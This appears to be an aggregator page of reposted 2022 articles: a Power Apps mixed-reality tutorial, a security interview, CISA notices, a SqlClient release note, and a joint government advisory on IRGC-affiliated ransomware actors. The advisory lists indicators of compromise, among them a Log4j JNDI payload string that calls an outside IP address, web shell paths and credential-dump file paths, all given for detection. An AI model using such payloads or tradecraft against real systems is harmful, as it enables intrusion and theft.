Create Low-Code MR Apps with Power Apps

Create Low-Code MR Apps with Power Apps

by | Sep 16, 2022 | Technology

This article is contributed. See the original author and article here.

For the past month, our Cloud Advocacy team has shared projects with you all that could be created with the Mixed Reality Toolkit. For this month, we’re taking a bit of a detour to showcase a Mixed Reality project that can be created with Microsoft Power Apps! 


 


Power Apps are organizational-specific applications or tools that allow you to create custom applications using many features, including a data platform that provides a flexible development environment to build custom apps for your business. Applications built with Power Apps offer great business logic to transform your manual business functions into automated processes. Also, these applications can be accessed via mobile devices or the browser, enabling users to create custom apps without writing code. 


 


Power Apps provides an extensible platform for users with minimal coding experience to develop applications with rich business logic. In addition, creators find it easy to interact with data and metadata while using Power Apps. 


 


Through Power Apps, you can create canvas applications. Microsoft Power Apps allows you to build business apps from a canvas with minimal coding. Creating a canvas app in Power Apps is as easy as dragging and dropping components onto the canvas, just as designing a PowerPoint presentation. You can also integrate business logic through various data sources. 


 


For this week, we put Power Apps to the test to create an app that displays 3D models both directly on screen as well as in Mixed Reality! The result? An awesome learning experience that leverages the Smithsonian 3D API and open-source models! Joining me this week is Daniel Laskewitz, Sr. Cloud Advocate within our Power/Fusion Cloud Advocacy team. We partnered together to create this project and we’re excited to tell you more about it! 


 


The Idea 


In my last post, I shared with you all a VR museum experience that leveraged the Apollo 11 mission models provided by the Smithsonian 3D Digitization project. I wanted to explore other collections and thus landed on the Coral Collection. As I thought about how I could turn this collection into a learning opportunity, I thought it’d be cool to bring the models into my own space and learn more about coral both in-app and in Mixed Reality! What I envisioned would be an app that provides a selection of coral to both learn facts and view the models in ‘real life’ without the need to visit the museum. The added convenience of bringing the museum experience to me was the icing on the cake. 


 


One of the cool parts about the Power Platform is that there are many data sources to connect to. There are already more than 800 available out of the box! But, even when your data source is not one of those 800 connectors, you can create your own connector. The Smithsonian 3D Digitization project also has an API available which offers the possibility to search for 3D objects. If you could combine that with the idea of the app with the collection of corals, it would be a real killer app. 


 


Finding Inspiration 


I’m a huge fan of using Dribbble and Pinterest to find inspiration for creating projects. For this project, I went down the rabbit hole of searching for AR Museum Apps. Once I exhausted that option, I began to search for AR Learning Apps. Having this variety in form and function provided insight into the various ways creators are designing UI for AR learning experiences. 


 


After browsing the work of many creative designers, I settled on the following design for the app: 


 


A mockup of the app.A mockup of the app.


 


 


Creating the Main Screen 


If this app were to ever be created as a full-fledged experience, I’d image that there’d be an introduction for each collection available in the app. Keeping that in mind, I decided to create an introduction screen for the Corals and Coral Reefs collection. I leveraged a very beautiful image on Unsplash by Scott Web for the background and configured some basic Power Apps components. I wanted to maintain the vibrancy of the sea urchins while also ensuring that the text on the screen would be legible. With that said, I added a black rectangle component behind the collection description and lowered the opacity so that the white text would stand out more without taking away from the beauty of the sea urchins. Another thing I made sure to do was try to incorporate roundness as best as possible. The default Power Apps button is round, however, I desired more curvature. Therefore, I increased the border radius to 50 and got exactly what I wanted! 


Introduction screen for Corals and Coral Reefs collection.Introduction screen for Corals and Coral Reefs collection.


 


 


Storing Models on OneDrive 


With the Introduction screen complete, I needed to find a place to store the models. We ran into a bit of a hiccup while trying to render the models in Mixed Reality using the API, therefore, we needed an alternative solution. Fortunately, the models could be saved to OneDrive and in return a data connector could be made in Power Apps to OneDrive to reference the models. I’ll admit, this part of the project took quite a bit of setup because I had to both download the models and properly structure everything within the OneDrive folder. When you’re referencing models from OneDrive, you do so from an Excel spreadsheet that contains relative links to models within the overall project folder.


 


I’ll break it down for you: 


The folder structure for the project assets.The folder structure for the project assets.


Essentially, I had to first create a folder for the models and a folder for the photos of the coral. I made sure to follow a simple naming convention that could be repurposed for naming models and photos – this proved to be beneficial for my memory! Then in the Excel spreadsheet, I created a row for each coral which included its species, a description, a photo, and a model. The photo and model columns contain a relative link to the location of the coral’s model and photo. 


 


Excel spreadsheet table for the coral.Excel spreadsheet table for the coral.


 


After all the corals were added to the spreadsheet, I had to create a table of the data – this part (like all parts) is crucial because Power Apps pulls data from the table. 


 


Creating the Galleries 


After making the data connection in Power Apps to OneDrive, I was ready to create the galleries. After assigning the table as the data source, I configured the formula for the gallery components to display the image for the coral. I didn’t want to take up too much space on the screen with words – especially since species names are relatively long. Instead, I opted to just show the image. I also added more roundness to the UI by increasing the border radius of the images so that its corners were rounded. It really gave a different look and feel to the gallery as opposed to the default straight edges/corners. 


 


Gallery screen for the app.Gallery screen for the app.


 


 


Creating the Information Screens 


The final step for this portion of the project was to add in the 3D and Mixed Reality components. Power Apps provides a variety of Mixed Reality controls. For this project, I chose to integrate View in 3D and View in Mixed Reality: 


 


View in 3D - The View in 3D control enables you to view 3D content in the app. You can rotate and zoom into the model with simple gestures. 


 


View in Mixed Reality - The View in MR control enables you to see how a particular item might fit within a specified space. The control creates a button in your app. When the button is pressed, an overlay of the selected 3D model (in .glb, .stl, or .obj file formats) displays onto the live camera feed of the device. 


 


After adding the necessary components to the screen, I dragged and dropped in the Mixed Reality components to add in the wow-factor to the app. And honestly, it was like magic! I at most needed to reference the model selected in the gallery in the Power Apps formula bar – but I promise it was very easy! Specifically: galCoral.Selected.’3DModel’ 


 


Information screen for the app.Information screen for the app.


 


 


I’ll hand things over to Daniel now to share more about the work he did for the custom connector – Daniel, take it away!


 


Creating a Custom Connector


 


I have been working on the Independent Publisher Connectors program for over a year now. This program enables you to create connectors for the Power Platform and make them available for every user of the Power Platform, without having to be the owner of the API. If you would like to build a connector for a service that you use, you’re welcome to submit a connector for that in the Power Platform Connectors GitHub repository. 


 


I love building connectors for the Power Platform. So, when I heard about the API that’s available from the Smithsonian 3D Digitization project, I wanted to build a connector for that API immediately. The Smithsonian 3D API has only one operation – the File Search operation – so that makes it easy to develop a connector for it!  


 


When you build the connector, always make sure you think about the person who will use your connector later. In the Power Platform, it could very well be that other app makers also want to include your connector in their apps, so why not make it user friendly? 


 


On top of building the connector – I also created a search screen to search for 3D objects and a screen where you can look at and interact with the 3D object.


 


Smithsonian 3D Search UISmithsonian 3D Search UI


 


 


Workshop 


Oh – before we go, we have to tell you something exciting! We turned this entire project into a self-led workshop! To share the ability to create and host your own Power Apps workshop, we collaborated together to create an entire workshop equipped with a slide deck and complete instructions from start to finish. You can find the workshop by visiting: https://aka.ms/mr-power-platform  


 


The workshop consists of 5 labs and all the assets you’ll need to create your own version of the app we created. We’ve even provided the full Power Apps solutions as well. You’re welcome to swap out the models for your own! If you have any questions, feel free to submit a GitHub Issue and we’ll follow up with you in the repository. 


 

CISA Releases Eleven Industrial Control Systems Advisories

CISA Releases Eleven Industrial Control Systems Advisories

by | Sep 15, 2022 | Security, Technology

This article is contributed. See the original author and article here.

Dot gov

Official websites use .gov
A .gov website belongs to an official government organization in the United States.

SSL

Secure .gov websites use HTTPS

A lock (lock icon) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.

Thought Leadership Series: What keeps an AppSec CTO up at night?

by | Sep 15, 2022 | Technology

This article is contributed. See the original author and article here.

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Community Voices blog series, Microsoft Senior Product Marketing Manager Brooke Lynn Weenig talks with Chris Wysopal, Co-Founder and Chief Technology Officer of Veracode. The thoughts below reflect Chris’s views, not the views of Chris’s employer, and are not legal advice. In this blog post, Chris talks about app security.


 


Brooke: How did you get into app security?


 


Chris: I started playing with computers around 10 or 12 and in high school in the pre-Internet days. I would dial-up bulletin board systems and find forbidden information that you could not find in the library. I wanted to learn how to program computers. What really got me thinking about cybersecurity was finding these underground bulletin boards and seeing people talk about breaking into systems. It was in the back of my mind as I went to college and learned to be a programmer. It drove me to take my programming skills and use them for building cybersecurity tools and helping people build secure applications.


 


Before Veracode, I was doing security consulting, whether a company needed someone to help design a secure network or authentication system or do forensics work or incident response work. This new field of app security was emerging with the Internet. Banks, for instance, were building web applications and saying, “We do not have anyone who can help us make sure this is secure.” Emerging attacks, like SQL injection and cross-site scripting, were coming out. We were coming up with techniques to help them find those attacks. I had a development background and knew how to write and inspect code. Combining the development background with cybersecurity seemed like a great way to do something unique.


 


Brooke: What are microservices and why are they on the rise?


 


Chris: Microservices are a new way of doing more agile development. Instead of building big, monolithic applications, where 10 scrum teams are all working together on one big application, why not have those 10 scrum teams each work on a small piece of an application that has an API and does one function, like authentication or report generation?


 


It allows a small scrum team of seven or eight people to write, test, and deploy their own code. It is a much more reliable and efficient way to put small pieces of code into production and allows you to reuse those services across many different applications. Customers will have a couple dozen microservices and they will build dozens of applications out of those microservices. Also, API is now the way you interact with microservices, so API security becomes the main thing you’re trying to secure.


 


It is important to make sure each microservice takes care of its own security by using encryption and strong authentication. Each microservice has to be logging its activity and each one needs to be tested for security because they have attack surface that an attacker can interact with. Ultimately, it is more secure because you are securing a more well-defined service rather than a big, monolithic application.


Brooke: What are the biggest security threats and how can companies protect themselves?


 


Chris: One of the emerging big ones are vulnerabilities in open source components like the Apache Log4J exploit, which was a series of critical vulnerabilities discovered in December 2021. The way that organizations use open source is kind of a set it and forget it. Two, three, or four years later, a critical vulnerability comes out and they scramble. “Where am I using Log4J?” and everyone stops doing everything to respond. There should be a process where you stay up to date so when new vulnerabilities come out, you have a process for updating your open-source usage efficiently.


 


I recommend that people use software composition analysis as part of the development pipeline, so every time they build the code, they are looking at the open source and seeing if there have been any new vulnerabilities since they built their code. They can update those before they push it into production and keep their open source fresh and secure instead of letting it age and it becomes a crisis. There is the acronym SOAR – security, orchestration, automation, and remediation. You can bring that to code and do things in as automated a way as possible. Check every time you build to deploy the code. If you are a deploying daily, you are checking that daily. If it is monthly, you are checking it monthly.


 


Brooke: Will there be more automation and teaching machines to secure our code?


 


Chris: There was a presentation at Black Hat on GitHub’s Copilot, an AI pair programmer for developers, and it does a good job of writing code for developers. Of course, it learns how to do that from other code, and we know other code has vulnerabilities. These researchers found cases where Copilot was suggesting code that had vulnerabilities.


 


Even if you are using something like Copilot, you have to do security testing. It is not guaranteed that it gives you secure code, but on the other hand, if we have this other process of auto-remediation, maybe Copilot and auto-remediation can work together. Before it suggests the code, it can check it and make sure it is suggesting clean code. That just means that the two machines have to talk to each other first.


I do not want to make you think that we can fix every single vulnerability in an automated way, but if we can fix even half of them, that saves a huge amount of time.


 


Brooke: How do you help clients define their security control goals?


 


Chris: Different organizations are at different maturity levels. Some organizations don’t know how many applications they have, how many they’ve built, or where they are because they’re just starting out. A lot of it is what we call attack surface discovery, where you are discovering those web apps and APIs that you have exposed, or you’re going through your code repos and looking at all the different applications you’ve built.


 


The next step is prioritizing your applications because you don’t want to spend a lot of time on old legacy application that are going away in a few months or in a year versus the brand-new line-of-business application you just started using that you know will last for 10 years. Then, look at your open-source vulnerabilities because those are in the National Vulnerability Database that everyone can read. Take a big prioritization approach and cut out things that you are not going to fix, whittling it down to just the most important applications and vulnerabilities. Automate that vulnerability finding process as much as possible.



Brooke: How can IT and security teams work together to solve vulnerabilities faster?


 


Chris: That’s a big question I get all the time because people struggle to get these two teams to work together. Traditionally, they have done their thing off on their own. The development team develops stuff. The security team looks at all kinds of assets, like what the organization has purchased versus built, and tries to secure those things themselves.


 


With ongoing development of a new application or an application that you’re constantly updating, those teams have to build a working relationship. The best way to do that is for people on each team to meet on a regular basis so each team understands the challenges, struggles, and priorities of the other team. You have to break out of the silos and meet on a regular basis – weekly is good – and then, you can do some cross-pollination.


 


At Veracode, we have the concept of security champions, where developers work alongside the application security experts and learn things like threat modeling or manual penetration testing. Find people who think this is fun and cool, and it may be a new career for them. Get people to volunteer, if possible, but also get people from the security team working alongside the developers and saying,” I will help configure your build pipeline and integrate security testing into your pipeline for you.” Those types of things go a long way in getting the teams to really work together.



Brooke: What is needed to close the app security talent gap?


 


Chris: A lot of security can be picked up either on the job or in a boot camp-type environment. I’ve been talking to community colleges in Massachusetts, where Veracode is headquartered, about having certificate programs where people can learn how to run a vulnerability scan and how to work in a SOC, like where to look at a malware alert that’s coming from someone’s laptop or at a suspicious phishing test.


 


We should have more boot camps and more certificate programs at community colleges, so that people don’t have to go to school for four years to do this or to switch careers. They can do this on the side and see if they like it. On the demand side, companies have to be willing to take on interns and people doing this as their first job. We have intern programs at Veracode, and they’ve been very successful. We’ve hired a lot of people that way.


 


To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

CISA Adds Six Known Exploited Vulnerabilities to Catalog

by | Sep 15, 2022 | Security, Technology

This article is contributed. See the original author and article here.

CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates. 

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.  

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.

CISA and NSA Publish Open Radio Access Network Security Considerations

by | Sep 15, 2022 | Security, Technology

This article is contributed. See the original author and article here.

CISA and the National Security Agency (NSA) have published Open Radio Access Network Security Considerations. This product—generated by the Enduring Security Framework (ESF) Open Radio Access Network (RAN) Working Panel, a subgroup within the cross-sector working group—assessed the benefits and security considerations associated with implementing an Open RAN architecture. Focusing on current designs and specification standards, the ESF Open RAN Working Panel examined how security compares with, and is distinct from, traditional, proprietary RANs.

CISA encourages users, network operators, vendors, and stakeholders to review the considerations. For more information, see the ESF’s Open Radio Access Network Security Considerations, peruse CISA’s 5G Library, and visit Securing 5G Open RAN Architecture from Cybersecurity Risks.

Released: Microsoft.Data.SqlClient 4.1.1

by | Sep 14, 2022 | Technology

This article is contributed. See the original author and article here.

We have released an update to Microsoft.Data.SqlClient, version 4.1.1. The update addresses several issues that are important to our customers.


 


Updates in Microsoft.Data.SqlClient 4.1.1 include:


 


Fixed



  • Fixed connection failure by not requiring Certificate Revocation List (CRL) check during authentication. #1706

  • Parallelized SSRP requests on Linux and macOS when MultiSubNetFailover is specified. #1708, #1746

  • Added CommandText length validation when using stored procedure command types. #1709

  • Fixed NullReferenceException during Azure Active Directory authentication. #1710

  • Fixed null SqlBinary as rowversion. #1712

  • Fixed table’s collation overriding with default UTF8 collation. #1749


Changed



  • Updated Microsoft.Data.SqlClient.SNI (.NET Framework dependency) and Microsoft.Data.SqlClient.SNI.runtime (.NET Core/Standard dependency) version to v4.0.1 #1755, which includes the fix for AppDomain crash introducing in issue #1418

  • Code improvements: #1711


 


To get the new package, add a NuGet reference to Microsoft.Data.SqlClient in your application.


 


For the list of changes in Microsoft.Data.SqlClient 4.1.1, you can also see the Release Notes.


 


If you encounter any issues or have any feedback, head over to the SqlClient GitHub repository and submit an issue.


 


David Engel

CISA Adds Two Known Exploited Vulnerabilities to Catalog

by | Sep 14, 2022 | Security, Technology

This article is contributed. See the original author and article here.

CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.

Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations

by | Sep 14, 2022 | Security, Technology

This article is contributed. See the original author and article here.

Summary

Actions to take today to protect against ransom operations:

• Keep systems and software updated and prioritize remediating known exploited vulnerabilities.
• Enforce MFA.
• Make offline backups of your data.

This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as “the authoring agencies.”

This advisory updates joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.

Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.

The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.

This advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.

For a downloadable copy of IOCs, see AA22-257A.stix.

For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threat webpage.

Download the PDF version of this report: pdf, 836 kb

Technical Details

Threat Actor Activity

As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207. The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.

Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.

The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.

IRGC-affiliated actor activity observed by the authoring agencies includes:

  • In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
  • In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company’s operations for an extended period.
  • In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.
  • In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company’s network.

MITRE ATT&CK® Tactics and Techniques

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.

The authoring agencies assess the following tactics and techniques are associated with this activity.

Resource Development [TA0042]

The IRGC-affiliated actors have used the following malicious and legitimate tools [T1588.001, T1588.002] for a variety of tactics across the enterprise spectrum:

  • Fast Reverse Proxy (FRP) for command and control (C2)
  • Plink for C2
  • Remote Desktop Protocol (RDP) for lateral movement
  • BitLocker for data encryption
  • SoftPerfect Network Scanner for system network configuration discovery

Note: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Initial Access [TA0001]

As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].

The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:

  • Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
    • C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyecpauth
    • C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth
    • C:inetpubwwwrootaspnet_client

The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:

  • ${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)
  • RCE.class

Execution [TA0002]

The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

  • Wininet
  • Wininet’
  • WinLogon
  • CacheTask

Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Persistence [TA0003]

The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

  • Domain Admin
  • it_admin
  • DefaultAccount
  • Default01

Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Exfiltration [TA0010]

The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:

  • C:WindowsTempsassl[.]pmd
  • C:WindowsTempssasl[.]zip
  • C:UsersDefaultAccountAppDataLocalTemplsass[.]dmp
  • C:UsersDefaultAccountAppDataLocalTemplsass[.]zip

Impact [TA0040]

The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity’s networked printer(s). The notes included the following contact information:

  • @BuySafety (Telegram)
  • @WeRBits (Telegram)
  • +93794415076 (WhatsApp)
  • werbits@onionmail[.]org
  • buysafety@onionmail[.]org
  • yacashcash@rambler[.]ru

Note: For additional contact information included in ransom notes, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

DETECTION

The authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.

  • Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts.
    • Note: Refer to Appendix A for IOCs.
  • Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021- 45105.
  • Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021- 34523, and CVE-2021-31207.
  • As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021- 31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470 because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.
  • Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.
  • Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
  • Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.
  • Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system and scheduled tasks—including each step these tasks perform—for unrecognized “actions.”
  • Review antivirus logs for indications they were unexpectedly turned off.
  • Look for WinRAR and FileZilla in unexpected locations.
  • Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.

Note: For additional approaches on uncovering malicious cyber activity, see joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity, authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Mitigations

The authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.

Implement and Enforce Backup and Restoration Policies and Procedures

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.
  • Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).

Patch and Update Systems

  • U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free CISA Cyber Hygiene Services Vulnerability Scanning to enable continuous scans of public, static IPs for accessible services and vulnerabilities.
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021- 34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021- 31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021- 31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.

Evaluate and Update Blocklists and Allowlists

  • Regularly evaluate and update blocklists and allowlists.
  • If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Prevent any attempts to install or run this program and its associated files.

Implement Network Segmentation

  • Implement network segmentation to restrict a malicious threat actor’s lateral movement.

Secure User Accounts

  • Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
  • Require administrator credentials to install software.

Implement Multifactor Authentication

  • Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.

Use Strong Passwords

Secure and Monitor RDP and other Potentially Risky Services

  • If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.
  • Disable unused remote access/RDP ports.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute force campaigns), and log RDP login attempts.

Use Antivirus Programs

  • Install and regularly update antivirus and anti-malware software on all hosts.

Secure Remote Access

  • Only use secure networks.
  • Consider installing and using a VPN for remote access.

VALIDATE SECURITY CONTROLS

